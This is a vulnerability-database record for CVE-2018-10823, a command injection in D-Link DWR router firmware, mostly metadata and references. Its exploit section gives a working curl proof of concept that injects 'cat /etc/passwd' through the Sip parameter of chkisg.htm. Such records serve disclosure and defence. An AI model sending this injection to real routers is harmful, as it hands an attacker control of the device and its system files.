ID
VAR-E-201704-0088
CVE
| cve_id: | CVE-2018-10823 | Trust: 2.1 |
| cve_id: | CVE-2017-6190 | Trust: 1.3 |
| cve_id: | CVE-2018-10822 | Trust: 0.5 |
| cve_id: | CVE-2018-10824 | Trust: 0.5 |
EDB ID
45676
TITLE
D-Link Routers - Command Injection - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
D-Link Routers - Command Injection. CVE-2018-10823 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | d link | model: | routers | scope: | - | version: | - | Trust: 1.6 |
| vendor: | d link | model: | dwr-116 | scope: | - | version: | - | Trust: 0.5 |
| vendor: | d link | model: | plain-text password storage | scope: | - | version: | - | Trust: 0.5 |
| vendor: | d link | model: | dwr-116 1.05 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | d link | model: | dwr-116 1.01 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | d link | model: | dwr-116 1.00 b10 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | d link | model: | dwr-116 1.05b09 | scope: | ne | version: | - | Trust: 0.3 |
EXPLOIT
## Shell command injection
CVE: CVE-2018-10823
CVSS v3: 9.1
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Description: An issue was discovered on D-Link routers:
DWR-116 through 1.06,
DWR-512 through 2.02,
DWR-712 through 2.02,
DWR-912 through 2.02,
DWR-921 through 2.02,
DWR-111 through 1.01,
and probably others with the same type of firmware.
An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.
PoC:
Login to the router.
Request the following URL after login:
`$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd`
See the passwd file contents in the response.
Trust: 1.0
EXPLOIT LANGUAGE
md
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Command Injection
Trust: 1.6
TAGS
| tag: | exploit | Trust: 1.0 |
| tag: | file inclusion | Trust: 1.0 |
| tag: | arbitrary | Trust: 0.5 |
| tag: | vulnerability | Trust: 0.5 |
| tag: | code execution | Trust: 0.5 |
CREDITS
Blazej Adamczyk
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2018-10823 | Trust: 2.1 |
| db: | EXPLOIT-DB | id: | 45676 | Trust: 1.6 |
| db: | NVD | id: | CVE-2017-6190 | Trust: 1.3 |
| db: | EDBNET | id: | 99965 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 142052 | Trust: 0.5 |
| db: | NVD | id: | CVE-2018-10824 | Trust: 0.5 |
| db: | NVD | id: | CVE-2018-10822 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 149844 | Trust: 0.5 |
| db: | BID | id: | 97620 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2018-10823 | Trust: 2.1 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2017-6190 | Trust: 1.0 |
| url: | http://sploit.tech/2018/10/12/d-link.html | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/45676/ | Trust: 0.6 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2018-10822 | Trust: 0.5 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2018-10824 | Trust: 0.5 |
| url: | http://seclists.org/bugtraq/2017/apr/28 | Trust: 0.3 |
| url: | http://www.d-link.com | Trust: 0.3 |
SOURCES
| db: | BID | id: | 97620 |
| db: | PACKETSTORM | id: | 142052 |
| db: | PACKETSTORM | id: | 149844 |
| db: | EXPLOIT-DB | id: | 45676 |
| db: | EDBNET | id: | 99965 |
LAST UPDATE DATE
2022-07-27T09:11:31.161000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 97620 | date: | 2017-04-18T00:06:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 97620 | date: | 2017-04-07T00:00:00 |
| db: | PACKETSTORM | id: | 142052 | date: | 2017-04-07T19:22:22 |
| db: | PACKETSTORM | id: | 149844 | date: | 2018-10-18T03:47:09 |
| db: | EXPLOIT-DB | id: | 45676 | date: | 2018-10-12T00:00:00 |
| db: | EDBNET | id: | 99965 | date: | 2018-11-04T00:00:00 |